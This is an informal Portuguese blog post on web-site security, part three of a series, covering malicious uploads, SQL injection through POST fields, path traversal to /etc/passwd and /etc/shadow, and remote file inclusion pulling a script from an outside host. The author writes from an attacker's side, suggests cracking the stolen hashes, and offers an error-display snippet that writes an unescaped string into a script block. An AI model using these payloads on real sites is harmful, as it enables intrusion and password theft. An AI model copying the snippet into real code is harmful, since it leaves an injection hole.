Segurança em Web-Sites. (Parte 3-Outros bugs)
Faaaaaaaala galera XD. Galera?? oO Quase ninguem visita meu blog, então dexa keto o ‘galera’ XD
Reformulando:
Faaaaaaala putada!!! hauheuahauaehu XD, zuera ^^’
Vou poupar-lhes das ladainhas de introdução e pular pro q intereça de vez….
Alem dos dois problemas principais que eu citei temos varios outros problemas.
Uploads Maliciosos
Muitos sites oferecem opção de upload de arquivos e alguns ate descompactam pacotes zip que vc. manda. Tai o problema, pois se vc não souber filtrar os arquivos um exploit ou outro codigo mailicioso pode ser inserido no seu site. Por exemplo um dia desses postei um script onde era pra postar imagens com a extensão .jpg, como o programador não sabia que o linux não leva em consideração a extensão do arquivo pois usa o padrão MIME de detecção de tipo de arquivo eu consgui executar o .jpg como um script XD.
Não so assim da pra fazer como de outras maneiras, deixarei sua criatividade lhe guiar XD
Métodos post desprotegidos
Uma coisa que ví muito também, são paginas que usam metodo post descaradamente, mas sem a proteção devida só dando inportancia para os GETs. Isto pode feder, por que imagina uma enquete que use o metodo post e insira a opção selecionado por um input-radio e apensiona direto ao SQL, como vcs ja viram, eu poderia pegar o form de post, redirecionar o link direito para a pagina de “action” e modificar a opção do radio-box de “opt2″ para “opt2′; comandos sql XD –” e ele seria apensado ao query sql ja que não tem proteção no post o.O
Verificação de erros inseguro
Muita gente usa JAVASCRIPT pra checar erros em campos de forms e etc…, mas só java não é o suficiente pois eu posso salvar o codigo html da pagina modificar o form e retirar a checagem de erros java. Então o certo é fazer a checagem pelo java e pelo script que salva as informações também, ja que o script que esta no server nao pode ser retirado. Ta ai exemplos ASP e PHP de como tratar um erro deste, eh muito facil…
ASP:
Response.Write “<script>alert(’”& strErro &”‘);”
Response.Write “history.back(-1);</script>”
Response.End
PHP:
echo “<script>alert(’$erro’);”;
echo “history.back(-1);</script>”;
die;
pronto! Isto dai exibe o erro e retorna para a pagina anterior ^^, viu q nem doeu?? xD
Link-access por metodo get.
Ja vi muita pagina acessar seus links assim:
www.site.com.br/link.php?url=index.php
Mas acontece que da pra mim fazer isto neste link se o apache no linx estiver desprotegido:
www.site.com.br/link.php?url=../../../../etc/passwd
www.site.com.br/link.php?url=../../../../etc/shadow
e estão em suas mãos todas as senhas da maquina linux host, HEUAEHUAEHUEAHEAU XD, dai eh so usar um brute force para criptografia DES ou SHADOW e ta feita a cagada.
Outra coisa que da pra fazer também:
www.site.com.br/link.php?url=www.meusite.com/meuscript.php
e se o script link.php estiver usando o recurso include do php o seu script é lido e executado, lembrando que em meusite não pode ter php ativado pois os codigos php serao interpretados antes e irão sumir de meuscript.php.
Eh isso aew galera!!! Termino aqui os 3 tutos sobre segurança web. Apartir daqui é com vocês!
NÃO ME RESPONSABILIZO PELO MAU USO DAS INFORMAÇÕES DOS MEUS 3 ARTIGOS!
Epero q tenham gostado ^^
Abraços.
Eduardo “Duzao7667″ A. Ayres.
Gostei dos tutoriais
Muito bom. seu blog nao tem visitas por falta de marketing rsrs mas o conteudo e nota 10 ! parabens e obrigado por prestar esclarecimentos de importancia publica =)